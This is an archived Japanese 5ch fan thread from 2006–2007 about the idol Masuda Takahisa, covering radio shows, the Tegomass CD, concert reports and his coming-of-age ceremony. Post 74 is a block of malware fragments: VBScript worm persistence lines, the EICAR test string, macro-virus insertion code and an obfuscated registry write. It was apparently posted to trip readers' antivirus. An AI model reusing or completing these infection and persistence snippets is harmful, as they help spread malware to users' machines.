5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【キラキラサラサラシャカリキ14】

1 :リ `▽´ノリ 石鹸でもテゴマスでも全力投球:2006/12/09(土) 18:08:51 ID:VNRHbiYo
◆お約束◆
【折木・やらかし話禁止】
【安置ネタは安置スレで】
【荒らし・釣り師は徹底的に放置して孤独死させよう】
【禿しいお花畑は島で】
【実況厳禁】【ハイパー・全角・ギャル文字・「萌え」・☆等のゴミ禁止】

前スレ
【キラキラサラサラシャカリキ13】
ttp://tv7.2ch.net/test/read.cgi/jr/1132368931/
過去ログは>2

2 :リ `▽´ノリ サンタが届けます:2006/12/09(土) 18:10:35 ID:VNRHbiYo
人気あるの?増田貴久
ttp://saki.2ch.net/jr/kako/991/991987857.html
人気者だぜ!増田貴久
ttp://saki.2ch.net/jr/kako/1000/10009/1000913996.html
☆☆☆増田貴久くん♪☆☆☆
ttp://tv.2ch.net/test/read.cgi/jr/1014719536
【キラキラサラサラシャカリキ】升タケゾウ升4【でもマスッチョ】
ttp://tv2.2ch.net/test/read.cgi/jr/1037613846/l50
【キラキラサラサラシャカリキ】升タケゾウ升5【でも食いドル】
ttp://tv2.2ch.net/test/read.cgi/jr/1054473776/l50
【キラキラサラサラシャカリキ】升タケゾウ升6【とまどいながら】
ttp://tv2.2ch.net/test/read.cgi/jr/1062172659/l50
【キラキラサラサラシャカリキ】升タケゾウ升7【ニッコリモッコリ】
ttp://tv2.2ch.net/test/read.cgi/jr/1068147355/
【キラキラサラサラシャカリキ8】
ttp://tv4.2ch.net/test/read.cgi/jr/1070975477/
【キラキラサラサラシャカリキ9】
ttp://music4.2ch.net/test/read.cgi/jr/1077881299/
【キラキラサラサラシャカリキ10】
ttp://music4.2ch.net/test/read.cgi/jr/1090048640/
【キラキラサラサラシャカリキ11】
ttp://tv7.2ch.net/test/read.cgi/jr/1096704702/
【キラキラサラサラシャカリキ12】
ttp://tv7.2ch.net/test/read.cgi/jr/1115559370/


3 :リ `▽´ノリ 好きデス:2006/12/09(土) 18:12:09 ID:VNRHbiYo
お仕事

(金) 23:00〜23:30「bayfm」(FM 78.0 79.3 87.4 77.7 79.7)
ttp://www.bayfm.co.jp/

笑える恋はしたくない/赤井三太役
豚局(金)10 06.12.01〜06.12.15(3回)
ttp://www.tbs.co.jp/waraerukoi/

テゴマスCD
06.12.20発売
スウェーデン盤(06.11.15先行発売)
Miso Soup
Miso Soup(オリジナル・カラオケ)
※全編英語詞

初回限定盤
ミソスープ
はじめての朝
Chocolate
特典DVD(『ミソスープ』ビデオクリップ・メイキング)

通常盤
ミソスープ
はじめての朝
Chocolate
砂時計
ミソスープ(オリジナル・カラオケ)


4 :ユー&名無しネ:2006/12/09(土) 22:23:14 ID:BWMeoB6j
>1
乙!
少しはやめのクリスマスプレゼント
つ◎◎◎◎◎◎◎◎

5 :ユー&名無しネ:2006/12/10(日) 16:48:05 ID:sdMFeHu6
◎◎◎◎◎

6 :ユー&名無しネ:2006/12/10(日) 21:16:28 ID:M7TjxQFv
ザサンデーではじめての朝聞こうと構えてたのに…
アリエナス

7 :ユー&名無しネ:2006/12/11(月) 17:55:45 ID:7HGaKFf/
禿同

8 :ユー&名無しネ:2006/12/11(月) 21:20:24 ID:34r/vZbU
升友はどこだよ?

9 :ユー&名無しネ:2006/12/12(火) 01:17:47 ID:2DDJtsCp
ミソスープ輸入盤をHMV店頭販売分で予約してあったんだが入荷したと連絡あった
予約分でなくならなければ輸入盤店頭並んでると思う
ちなみに帝都

10 :ユー&名無しネ:2006/12/12(火) 16:12:44 ID:oCNSJBNd
尼で普通に売ってるよ

11 :ユー&名無しネ:2006/12/12(火) 16:26:13 ID:cbQqI17S
海外サイトで通販したが三週間たってもまだ届かない
姐さん方のレスで店頭に並んでるの知って後悔w
悔しいから届くまでCDショップに近づかないノシ

12 :ユー&名無しネ:2006/12/12(火) 17:42:21 ID:2DDJtsCp
>10
尼とかで受け付けてるが今だと配送予定来年じゃないか


13 :ユー&名無しネ:2006/12/15(金) 01:13:21 ID:TCwUba3v
レコメン乙!
いじられてる升がキャワキャワでテラワロスだったよ(w
また出してもらえるといいな(*´∀`)

14 :ユー&名無しネ:2006/12/15(金) 07:06:37 ID:7CECzSqP
ぶーぶー

15 :ユー&名無しネ:2006/12/15(金) 15:33:32 ID:iQVXiSE1
昨日のレコメン
升がいじられてた、でも笑う声が沢山だね
太一君ありがとう

16 :ユー&名無しネ:2006/12/15(金) 20:23:17 ID:ami2q3Vy
19日のON8ゲストがテゴマスです@bayFMのメル
升ゲストの時おもしろかったので期待

17 :ユー&名無しネ:2006/12/15(金) 23:00:05 ID:AAQo8CId
升三太乙!
三太キャワキャワだったな(*´∀`)

18 :ユー&名無しネ:2006/12/15(金) 23:42:31 ID:cQyTtAjx
手繋ぎ羨ましかった…

チョッピリ大人な升見れてシアワセ

19 :ユー&名無しネ:2006/12/16(土) 01:36:12 ID:z8mdvr0q
チョコレートの歌詞がほしいです〜〜
升の声は、「熱くなる」で、超〜セクシー!!

20 :ユー&名無しネ:2006/12/16(土) 19:41:39 ID:zxc9fJeu
明日の公開録音当たった姐さんいないか脳

21 :ユー&名無しネ:2006/12/16(土) 20:12:54 ID:J6kdUxw0
>20 確かユニスレにいたよな


22 :ユー&名無しネ:2006/12/17(日) 02:31:55 ID:YJqLwa3w
公開録音当たりました
明日ってかもう今日か逝って来ます

23 :20:2006/12/17(日) 11:18:52 ID:+FWizX0B
>22 当選オメ!レポ115で待ってますん

24 :ユー&名無しネ:2006/12/17(日) 12:01:23 ID:AcVxufT3
当たった姐さんオメ!
どんな問題が聴きたいでしょ?
升と話できること、本当に幸せでしょ
レポ待ってね

25 :ユー&名無しネ:2006/12/17(日) 12:09:06 ID:GToVSbVB
日本語?

26 :ユー&名無しネ:2006/12/17(日) 18:23:26 ID:84TkQM2f
海外のヲタが一生懸命日本語書いたような気がする

>24
メール欄にsageを入れてください

27 :ユー&名無しネ:2006/12/17(日) 19:05:06 ID:AcVxufT3
はーい
姐さんたちよろしく

28 :ユー&名無しネ:2006/12/17(日) 19:13:37 ID:8Wxh/tiG
ID:AcVxufT3に和んだ

29 :ユー&名無しネ:2006/12/18(月) 00:37:29 ID:ZLiEPt4h
エロの買い物の仕方の真似の時の声がヤバス(*´∀`)
升コレも健在だったしおもしろかった

30 :22:2006/12/18(月) 01:26:21 ID:/Ra064EZ
ただいまノシ
今日の収録はエロがいきなり参加で、2人のトークやら何やらでおもしろかった
前振りで今日きちゃうかも〜と言ってたら本当に現れたエロ
升の今日の服は割とふつーだったような・・・いや升コレかな?!
相変わらずブーツインしてた
録音始まる前に緊張して胸に手あててる仕草がカワユカッタデス
また公開録音やりたいって升が言ってた
升が照れながら赤ちゃん言葉で愛の告白罰ゲームやらされてるのが禿カワユスだった



31 :ユー&名無しネ:2006/12/18(月) 09:20:04 ID:76isudWd
赤ちゃん言葉愛の告白!!
kwsk

32 :ユー&名無しネ:2006/12/18(月) 18:31:04 ID:jtd47Eca
赤ちゃん言葉愛の告白!!
ktkr

33 :ユー&名無しネ:2006/12/19(火) 00:31:09 ID:maSkYzGR
IDに升キタワァ*・゜゚・*:.。..。.:*・゜(n‘∀‘)η゚・*:.。..。.:*・゜゚・*!!!!

34 :ユー&名無しネ:2006/12/19(火) 14:42:05 ID:RlSki4jC
http://players.music-eclub.com/?action=user_song_detail&song_id=89335

\\   一  万  年  と  二  千  年  前  か  ら  愛  し  て  る //
  \\  八 千 年 過 ぎ た 頃 か ら も っ と 恋 し く な っ た     //
   \\       一 億 と 二 千 年 後 も 愛 し て る         //
     \\ 君 を 知 っ た そ の 日 か ら 僕 の 地 獄 に 音 楽 は 絶 え な い//
       _ _∩.     _ _∩.     _ _∩.     _ _∩.     _ _∩.     _ _∩.
     ( ゚∀゚)彡  ( ゚∀゚)彡  ( ゚∀゚)彡  ( ゚∀゚)彡  ( ゚∀゚)彡  ( ゚∀゚)彡
     (  ⊂彡.   (  ⊂彡.   (  ⊂彡.   (  ⊂彡.   (  ⊂彡.   (  ⊂彡
    _ _∩.     _ _∩.     _ _∩.     _ _∩.     _ _∩.     _ _∩.     _ _∩.
  ( ゚∀゚)彡  ( ゚∀゚)彡  ( ゚∀゚)彡  ( ゚∀゚)彡  ( ゚∀゚)彡  ( ゚∀゚)彡  ( ゚∀゚)彡
  (  ⊂彡.   (  ⊂彡.   (  ⊂彡.   (  ⊂彡.   (  ⊂彡.   (  ⊂彡.   (  ⊂彡.
   |   |     |   |     |   |     |   |    |   |     |   |     |   |
   し ⌒J.    し ⌒J.    し ⌒J.    し ⌒J.   し ⌒J.    し ⌒J.    し ⌒J

35 :ユー&名無しネ:2006/12/19(火) 16:58:20 ID:0sMgE4H/
>33
裏山


ジヌン電車の中で片手にミソスープなんだかwktkしすぎて怪しい人

36 :ユー&名無しネ:2006/12/20(水) 07:57:28 ID:EIB0CYVb
はじめての朝が禿良曲な件

37 :ユー&名無しネ:2006/12/20(水) 11:06:57 ID:M8anOisX
良曲な上に聴いた事ない升の歌い方にビビった
すごい表現力だな

38 :ユー&名無しネ:2006/12/20(水) 17:51:21 ID:EIB0CYVb
禿同

高音が耳に残る

39 :ユー&名無しネ:2006/12/20(水) 18:31:16 ID:5x05c+oe
まだ聞いてないんだがいい意味でか?

40 :ユー&名無しネ:2006/12/20(水) 18:55:24 ID:NfAHvCgO
勿論

41 :ユー&名無しネ:2006/12/20(水) 19:55:59 ID:5x05c+oe
>40d!期待して家帰りますノシ

42 :ユー&名無しネ:2006/12/20(水) 23:09:44 ID:zQVcRm/n
全曲良すぎ!特にはじめての朝
確実に歌唱力上がってる!

43 :ユー&名無しネ:2006/12/21(木) 00:11:49 ID:RZPLZpZ3
PV、メイキングネ申だな
いろんな表情見れて楽しい
路上ライブシーンW●T思い出した
エロ升でライブやってくれないか脳
屋内で

44 :ユー&名無しネ:2006/12/21(木) 04:37:11 ID:E3ICIEt5
WATに謝れ!

45 :ユー&名無しネ:2006/12/21(木) 16:44:30 ID:B4b6iNtP
エロ升でやってほしいな
チョコレートは振付キボン
きっとキャワに違いない

46 :ユー&名無しネ:2006/12/23(土) 21:24:23 ID:oSpFbUnW
4日連続1位オメ!
昨日もキャワすぎだったね
升おもしろいよ升

47 :ユー&名無しネ:2006/12/26(火) 09:26:13 ID:veUadOft
升おめ!
いい歌をありがトン

48 :ユー&名無しネ:2006/12/26(火) 10:14:44 ID:BBKzdnzN
升オメ

49 :ユー&名無しネ:2006/12/26(火) 12:15:55 ID:94YLBCpG
升おめ
ドチドチしてたんだがちょっとホッとした
100枚買えなかったがまだ塩リクガンガル

50 :ユー&名無しネ:2006/12/27(水) 00:24:17 ID:putW4I4k
ミソスープ文化放送の1月の推薦曲?みたいなのになってたよ

51 :ユー&名無しネ:2006/12/29(金) 23:29:29 ID:xh1C4dOD
升塩がヤバイ ネ申

52 :ユー&名無しネ:2006/12/29(金) 23:55:09 ID:Do8fPZXf
>51
kwsk!
升塩聞けないから 禿 ウラヤマ

53 :ユー&名無しネ:2006/12/29(金) 23:58:37 ID:AFUL/o9s
>52
もうちっと探してみては?

54 :ユー&名無しネ:2006/12/30(土) 00:03:30 ID:Do8fPZXf
>53
実況見てたけど文字だけじゃ全然わかんなかったから

55 :ユー&名無しネ:2006/12/30(土) 00:07:04 ID:YBQvpRnG
連投スマソ
ユニスレリロってなくて今見てきました
スルーしてください

56 :ユー&名無しネ:2006/12/31(日) 18:03:41 ID:a+6yRCbG
石鹸PVのアニメ
升だけ頭の上に骨付き肉とか豚とか乗せてるのがキャワ

57 :ユー&名無しネ:2006/12/31(日) 23:26:17 ID:XuzEyCrw
升もうすぐ今年が終わるね
キャワな升ずっとダイシテル
姐さん方来年もヨロシク

58 :ユー&名無しネ:2007/01/01(月) 01:48:34 ID:9WCmTkxK
今年もガッツリ升応援するよ!心の中で…だけど

59 : 【凶】 【228円】 :2007/01/01(月) 01:51:10 ID:K8ATHsbO
升キャワ今年もよろしく

60 :ユー&名無しネ:2007/01/01(月) 11:53:40 ID:75N5lMVN
今年もキャワキャワな升コレよろ
紺ツア楽しみにしてるよ(*´∀`)ノシ

61 :ユー&名無しネ:2007/01/01(月) 20:45:10 ID:qdPuUgGM
升あけおめ
今年も升の笑顔たくさん見れるとイイナ
姐さんたちことよろ

62 :ユー&名無しネ:2007/01/01(月) 22:52:18 ID:Rx5XJ741
姐サン達アケオメコトヨロ
思い出したので牛紺レポ
味噌歌ってからバックから戻ってくる待機時間
トロッコ上でニコニコお手振りしてる升にオムがそっと近づいて膝カックンしてた
しらんぷりしてるオムをよそに楽しそうに崩れ落ちるマネしてた


63 :ユー&名無しネ:2007/01/02(火) 01:31:48 ID:AwWhcVgi
>62
レポ姐さんd!
映らない所でも楽しくやってたんだな
ホコーリだ

64 :ユー&名無しネ:2007/01/02(火) 01:36:18 ID:AwWhcVgi
スマソ℃んくさorz
>62ダタ

65 :ユー&名無しネ:2007/01/03(水) 19:27:25 ID:Z4qV5xCT
やっとサヤエンのPV見れた
6人の特徴をつかんでてキャワキャワ!
升オイシイし
紺でサヤエン衣装がずり下がって直しながら踊っていたのを思い出した
なにやってもキャワキャワだな
今年も期待して升


66 :ユー&名無しネ:2007/01/03(水) 22:54:16 ID:n1KbDLxu


67 :ユー&名無しネ:2007/01/07(日) 00:20:31 ID:jrGODoEg
成人式って凸アクゴ豚升あと誰?

68 :ユー&名無しネ:2007/01/07(日) 00:21:52 ID:jrGODoEg
IDまでもズニア表記

69 :ユー&名無しネ:2007/01/07(日) 00:28:00 ID:HZJkEQfn
>67-68
IDオメ!

70 :ユー&名無しネ:2007/01/07(日) 11:36:52 ID:DHG91r6R
仕事場で有線かかってるけどミソスープまだ聴いたことナス
ナンデダロウ??

71 :ユー&名無しネ:2007/01/07(日) 15:23:44 ID:ip1DiulB
>70
聞ける環境ならリクよろしく

72 :ユー&名無しネ:2007/01/08(月) 00:41:21 ID:0AWwjeNL
海老氏ゐが升と電話したラスィ
ソースつ蛇波基地連載

73 :ユー&名無しネ:2007/01/08(月) 18:06:35 ID:HpL/5uNQ
あらちたこやきMCにて升の話が
今年成人式誰?と麺が聞いて升!とオタが答えると小僧が須磨って言ってると思ったとw
升もう二十歳なのかと言ったり味噌汁話もしてた

携帯なんで改行おかしかったらスマソ

74 :ユー&名無しネ:2007/01/08(月) 18:38:46 ID:3SgQ0NSn
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

75 :ユーは名無しネ:2007/01/08(月) 18:44:35 ID:Ehlks/bM
>73
d!升 あらち某麺かけもヲタの自分が通りますよ
升 成人おめっ!


76 :ユー&名無しネ:2007/01/08(月) 20:02:23 ID:2GK2+5uf
升成人式オメ!
今朝のめざまし成人式有名人の
男子トップ扱いだったよ

77 :ユー&名無しネ:2007/01/08(月) 23:00:38 ID:afXXVj61
>76
あれは誕生日順だったよ

78 :ユー&名無しネ:2007/01/08(月) 23:36:24 ID:QacNdwP2
残念ながらめざましのは誕生日順だったよ
成人式どうなるかと思ってたけどちゃんとやってくれそうでヨカタ
ユニ会見とかあって例年とは違いそうだけど
立会人俺様とも言われてるね

79 :ユー&名無しネ:2007/01/09(火) 00:51:21 ID:frhg2tru
結局全部10日でFA?

80 :ユー&名無しネ:2007/01/10(水) 19:05:38 ID:uuOAiJVQ
ユニスレでは言えないが 復活も新曲も嬉しいけど
ちゃんとした成人式してもらいたかった


81 :ユー&名無しネ:2007/01/10(水) 21:03:19 ID:VDt0gXHh
ムーブの升相変わらずのストッパーぶりでキャワ(*´∀`)
やっと紺スケも発表になったしwktkwktk

82 :ユー&名無しネ:2007/01/10(水) 21:03:28 ID:4OafvH2t
升 改めて成人おめでd
ホントは一緒にお祝いしたかったけど いつかこんな日があったと笑えますように
今年はいっぱい升に会えますよーにナモナモ

83 :ユー&名無しネ:2007/01/10(水) 22:58:30 ID:pY4sEP+a
同ユニ他担ですが失礼します
いまさらユニスレにもかけないのでいわせてもらいますん
升成人オメ!
WSの袴姿センターウマーだたね
自分もきちんと成人式してホスイかったけど
記念すべき日になったよノシ
しめのストップザ升も健在で安心した(w
これからは石鹸として団子になってガンガレ

長文スマソかった

84 :ユー&名無しネ:2007/01/11(木) 00:38:36 ID:gh+DWIvL
自分も同ユニ他担ですが
升成人おめでとう
成人式残念だったけど紺でお祝いしますね

まだ袴姿見てないので楽しみ

85 :ユー&名無しネ:2007/01/11(木) 02:19:16 ID:Elm0tLhV
>80
禿同
復活も新曲も嬉しいが、そればかりで成人式スルーされ気味だったのがちとカナシスorz
袴姿のキャワな姿見れただけでも嬉しいんだけど

てか今年は本当に神宮梨でFAなのかな(´・ω・`)

>83>84
他担姐さん達優しい言葉d!



86 :ユー&名無しネ:2007/01/11(木) 11:24:32 ID:HSbt22PJ
袴姿お披露目しちゃったし今更神宮は無いんジャマイカ?

87 :ユー&名無しネ:2007/01/11(木) 18:10:44 ID:s3FK1Cic
会見やったとこ結婚式場だからきっと神主さんいて
祝詞あげてお祓いしてもらったはずだよ

88 :ユー&名無しネ:2007/01/11(木) 18:30:12 ID:NOu0HO8u
>87
そうだろうけど毎年恒例の儀式に参加させてやりたかった
愛人ヲタや凸ヲタも楽しみにしてただろうと思うし


89 :ユー&名無しネ:2007/01/11(木) 22:39:40 ID:q5LQ6p5l
自Gが立会人なんてなかなかステキジャマイカ

90 :ユー&名無しネ:2007/01/11(木) 23:18:26 ID:96igHxiG
>89がいいこと言った

91 :ユー&名無しネ:2007/01/11(木) 23:42:41 ID:aKOl3e7Y
http://chakorin.at.webry.info/200701/article_2.html
嵐の櫻井翔と繋がっている主婦(34歳)
『私は彼のバロメーター』


92 :ユー&名無しネ:2007/01/12(金) 02:00:12 ID:ULbT6/6+
>89
その発想は無かったw
センターだったし〆音頭で空回りもキャワだったし
升もいい思い出になったかもな

93 :ユー&名無しネ:2007/01/12(金) 02:05:08 ID:hu5tng5P
wじゃなくて(wね

94 :ユー&名無しネ:2007/01/12(金) 02:05:44 ID:ULbT6/6+
>93
スマソ vip癖が出たorz

95 :ユー&名無しネ:2007/01/12(金) 17:18:47 ID:zDp82sdp
どうやら壷がなくなるようだが
このスレも引っ越すのかのう?

96 :ユー&名無しネ:2007/01/13(土) 04:56:59 ID:KwnJFQEp
今の升の髪型ってあり?
左目に髪がかかってるのがどうしても気になって
もうちょっとサッパリしてほしい

97 :ユー&名無しネ:2007/01/13(土) 05:12:33 ID:SwDwSmoj
いや、早くのばしてくれ

98 :ユー&名無しネ:2007/01/13(土) 13:13:12 ID:OyEwIkZ9
>97
禿同
長くて茶色いほうが似合っててカ○゙エエ

99 :ユー&名無しネ:2007/01/13(土) 20:01:04 ID:5pq0GZJm
>98
禿同!
ダン○リ終わったら戻すと思ってたのに

100 :ユー&名無しネ:2007/01/13(土) 23:20:26 ID:WABU8Ic9
自分はキボンの頃の髪型がよかったな
トップ短めでサイドが長いの

101 :ユー&名無しネ:2007/01/13(土) 23:38:35 ID:EQDt/nz+
音楽戦士のオープニングなの知らなかった
嬉しいかぎりです升

102 :ユー&名無しネ:2007/01/14(日) 00:43:08 ID:GR5MW9eT
髪の色は戻そうと思ってたんだけど 周りの人が黒のほうが似合うと
言われ「じゃあそのままでいよう」と思ったと升ヒッツで言ってたyo
姐さん達が嫌なら塩に送ってみては?自分は今の髪チライじゃナス

103 :ユー&名無しネ:2007/01/14(日) 22:59:36 ID:+6U8sgBa
>100
禿同
あの頃の髪型が若々しいし一番似合ってるとオモ
ザリガニヘアーだよね

104 :ユー&名無しネ:2007/01/15(月) 00:22:43 ID:qToiUcrE
升割り箸スゲー

105 :ユー&名無しネ:2007/01/15(月) 20:16:55 ID:pN5I4J4Q
成人式は鬼太郎に見えたorz
サラサラヘアーがいい脳…

106 :ユー&名無しネ:2007/01/16(火) 00:45:05 ID:8iRWdm7q
ミソネイル?
さすが升コレ!

107 :ユー&名無しネ:2007/01/16(火) 21:53:16 ID:Ee5P44Rv
℃の連載待ちわびてたけど、そんなにイイ印象受けなかった
言いたい事は分かるんだけどさ

108 :ユー&名無しネ:2007/01/17(水) 01:00:18 ID:9B9SH45I
自分は℃兄の言うとおりだとオモー
升は変に頑固な所があるからそういう点も含めて
これを機会に自分で治していって欲しい

109 :ユー&名無しネ:2007/01/17(水) 01:29:31 ID:UUy3UU9P
拗ねてご機嫌ナナメってテンソン下がってる時とかあるよな
だんまりは何も生まれないし自分に自身持って腹割って接して欲しいなとは思う
自分出すの恐いのかな
飯の件もそれ理由にして誘い断ってるのかと思っちゃうよ
ま−ちょいオコチャマなところも訳わからんところもスチなんだがな

110 :ユー&名無しネ:2007/01/17(水) 11:06:26 ID:hBRXrvb4
遊び人の893と関わりたくないから距離置いてるんだよ
虫も犬も猫も鳥も嫌いなように人間も嫌いなんだろ

111 :ユー&名無しネ:2007/01/17(水) 13:50:59 ID:PJy74/E9
>108,109
そうだね
笛か誰かが塩で言ってたけど升は振り付け師に怒られた時も
要領が悪いからずーっと怒られてるって
多分謝っちゃえば早いんだけど納得いかないと引けないんだろうね
℃っくんにも同じで言い返せないと黙っちゃうのかな
ママンの飯もいいけど人付き合いの飯も大事なことに気付いてほすぃ

ちなみに升の今の髪型スチ派だ
ガチバカの頃のはあまり…短い方がいいな

112 :ユー&名無しネ:2007/01/17(水) 17:47:37 ID:yP0X27B3
豚切りスマソ
プレゾン新世紀の升的見所ってありますか?
つい最近ビデオを手に入れまして

113 :ユー&名無しネ:2007/01/17(水) 18:59:09 ID:7QSgIK4M
爺連載に升ktkr

114 :ユー&名無しネ:2007/01/17(水) 20:58:14 ID:edGDBXoq
>112
ショータイムしか出てないけどイツバッドは当然ながら出てる所は全部見所です
個人的にはスーパースターとか(・∀・)イイ!!と思われ

115 :ユー&名無しネ:2007/01/17(水) 22:45:41 ID:yN7m1TSl
自分担暦みじかいもので…小蔵のイツバッドで升におちました
プレゾン新世紀はバックでイツバッド踊ってるのでしょうか?
教えてくれませんか


116 :ユー&名無しネ:2007/01/18(木) 12:34:10 ID:tq6SDwWc
踊ってるよ
かなり幼いイツバドだが

117 :ユー&名無しネ:2007/01/18(木) 19:00:26 ID:CAsWS7i8
>116dです

118 :ユー&名無しネ:2007/01/19(金) 22:46:31 ID:Ggxu+H5W
>114
亀だがdです!
ヤパーリショータイムしか出てないのか
ショータイム何度もリピしてきますノシ

119 :ユー&名無しネ:2007/01/19(金) 23:38:58 ID:h/8rlZRM
ここ見て久しぶりに新世紀見てみた
シャカリキでテラカワイス
当時は窓某麺のヲタだったから青劇に通ったんだが
升に興味なかったんだな
この頃からヲタだったら良かったな
チラ裏スマソ

120 :ユー&名無しネ:2007/01/22(月) 10:59:24 ID:keKk/7vy
自分も久しぶりに新世紀見た
イイ男に成長してきてるな

121 :ユー&名無しネ:2007/01/27(土) 10:45:54 ID:Xt1ZLDHN


122 :(・∀・)つ/凵⌒☆ ◆85Hpe6ifO6 :2007/01/28(日) 09:58:44 ID:MdS3kQVb
ちょっと貼りつけますよ

205:(・∀・)つ/凵⌒☆◆85Hpe6ifO6 :2007/01/28(日) 09:39:10 [sage]
もういっちょ
ほれっ
http://img2.mojimaru.com/u/image/imagep.php?rd=45bbf0e08ec42

123 :ユー&名無しネ:2007/01/28(日) 10:02:14 ID:2N7a/p5l


124 :ユー&名無しネ:2007/01/28(日) 22:55:14 ID:Ak0LqTeS
升出演のプレゾンって2001年だよね
DVDとビデオは同じ内容かな?
欲しいんだが詳細がわからないもんで
教えてチャソでスマソ

125 :ユー&名無しネ:2007/01/28(日) 23:14:41 ID:i38eoUgz
>124
2001年の新世紀EMOTIONだったかと

126 :ユー&名無しネ:2007/01/29(月) 08:44:57 ID:Xzg85pZY
DVDとビデオは本編は同じ内容だが
2001年は撮影のカメラが別で
アングルが違うと言われてる

127 :ユー&名無しネ:2007/01/29(月) 09:16:52 ID:ymmafpwk
(^-^)/

128 :ユー&名無しネ:2007/01/29(月) 19:34:56 ID:C4sAhnOo
増田神スレ沈没につき難民が流れてくる模様

129 :(・∀・)つ/凵⌒☆ ◆85Hpe6ifO6 :2007/01/29(月) 21:21:26 ID:mAir/xAd
>127
IDに山ピーが…

>128
難民のあたしが流れてきましたよ('-^*)/


ムキムキ】プーさんはネ申Part2【ムチムチ
【食欲】増田貴久ネ申な件part2【旺盛】
【プーさん】増田貴久ネ申な件part2【プーさん】
【期待の星】増田貴久ネ申な件part2【日本代表】
【蟹座】増田貴久ネ申な件part2【O型】
【癒】増田貴久ネ申な件part2【癒】
【太陽】増田貴久ネ申な件part2【星屑】
【dream】増田貴久ネ申な件part2【magic】
【お菓子】増田貴久ネ申な件part2【大好き】
【スーパー】増田貴久ネ申な件part2【アイドル】
【☆】増田貴久ネ申な件part2【☆】
【増田】ネ申な件part2【貴久】
【全身】増田貴久ネ申な件part2【全霊】
ネ申な増田は貴久な件

スレタイ早く決めろって!みんなもスレ立てる努力して!

130 :(・∀・)つ/凵⌒☆ ◆85Hpe6ifO6 :2007/01/29(月) 21:24:29 ID:mAir/xAd
書き忘れ
ちなみに代行スレに書き込んだのは『ネ申な件Part2』です

131 :ユー&名無しネ:2007/01/29(月) 21:43:24 ID:xwncioBv
神な件のみんな
解散とかねぇからな、たぶん
(゜Д゜)

132 :しっとり ◆TvH2VJd3Nw :2007/01/29(月) 21:52:12 ID:YzO5iHIu
増田君のネ申の件は復活するから!
ネ申にいたみんな大丈夫ですよ(^0^)/
しっとりも増田君のためにがんばるからね!
ネ申の件のみなさんもがんばって!

133 :ユー&名無しネ:2007/01/29(月) 21:59:22 ID:wtyGbXJX
しっとりチャンキタ-----
久々の再会ウレシス(´Д`)
神な件は絶対復活させようネ


134 :しっとり ◆TvH2VJd3Nw :2007/01/29(月) 22:00:17 ID:YzO5iHIu
すいませんm(._.)m
ネ申な件をネ申の件と書いてしまいましたw(゚o゚)w
ごめんなさいm(__)m

135 :しっとり ◆TvH2VJd3Nw :2007/01/29(月) 22:08:44 ID:YzO5iHIu
>133さんへ
私がちょっと留守をしている間にネ申な件が終わっていたから
びっくりしました(*_*;
そうですね!必ず復活させましょうね(^0^)/

136 :ユー&名無しネ:2007/01/29(月) 22:15:14 ID:7KF6VtDL
勝手に避難所だか連絡所だかに使わないでください
メール欄にsageを入れてください

137 :しっとり ◆TvH2VJd3Nw :2007/01/29(月) 22:30:07 ID:YzO5iHIu
>136さんへ
あげてしまってすいませんm(._.)m

ネ申な件にいたみなさん!とりあえずこちらに
*ファンスレ*増田貴久ってどんな人?
http://tv9.2ch.net/test/read.cgi/jr/1168105220/

138 :ユー&名無しネ:2007/01/29(月) 22:44:49 ID:NzzLmvfa
なにこれ最悪
かなり迷惑なんですけど

139 :ユー&名無しネ:2007/01/29(月) 23:03:46 ID:+AitpV7m
コテいらね 難民いらね
升避難所へ逝ってください





たぁ↑

140 :ユー&名無しネ:2007/01/29(月) 23:17:52 ID:NzzLmvfa
ユニスレにまで貼るなんて
キチガイばっかりかよ

141 :124:2007/01/29(月) 23:55:53 ID:AlugAEW3
>125>126
d!
そっかじゃあ違うところもあるのか
どっちのがウマーかな
長持ちするのはDVDだけど

142 :ユー&名無しネ:2007/01/30(火) 10:07:03 ID:4HLkv+ro
ちょ何この流れ
1人1スレって知らないのかよ
基地外すぎて引く

143 :ユー&名無しネ:2007/01/30(火) 18:16:21 ID:IEAdYXW/
ネ申な件できたよ〜〜〜〜〜〜〜〜!!!!!!!!!!!!!!!!!〜〜〜〜〜〜〜!!!!!

144 :(・∀・)つ/凵⌒☆ ◆85Hpe6ifO6 :2007/01/30(火) 18:21:54 ID:sKpd/NdY
あがってたからびっくりした(((つш・`)))

145 :ユー&名無しネ:2007/01/30(火) 18:32:02 ID:FVl39l5b
スレひとつ立てるだけで祭り状態にする厨は氏ねよ

146 :(・∀・)つ/凵⌒☆ ◆85Hpe6ifO6 :2007/01/30(火) 19:03:13 ID:sKpd/NdY
>145
んふふふふふふふふ(*´艸`)+゚いいジャン別に

147 :しっとり ◆TvH2VJd3Nw :2007/01/30(火) 19:55:33 ID:dPJ/Y9qL
ここは増田君の本スレですよね!増田君のスレがまた一つ立ったことで
お祭り騒ぎみたいな事を言っているようですが
私達は本スレの人達にも負けないくらい増田君が大好きです!

148 :しっとり ◆TvH2VJd3Nw :2007/01/30(火) 20:01:58 ID:dPJ/Y9qL
あと本スレの人達は言葉遣いが悪いですね!
増田君は言葉遣いの悪い人は嫌いですよ!
2ちゃんのルールやage sageをとやかく言う前に人として
きちんとした方がよいのではないかと思いますが!

149 :ユー&名無しネ:2007/01/30(火) 21:03:14 ID:hszbYV7+
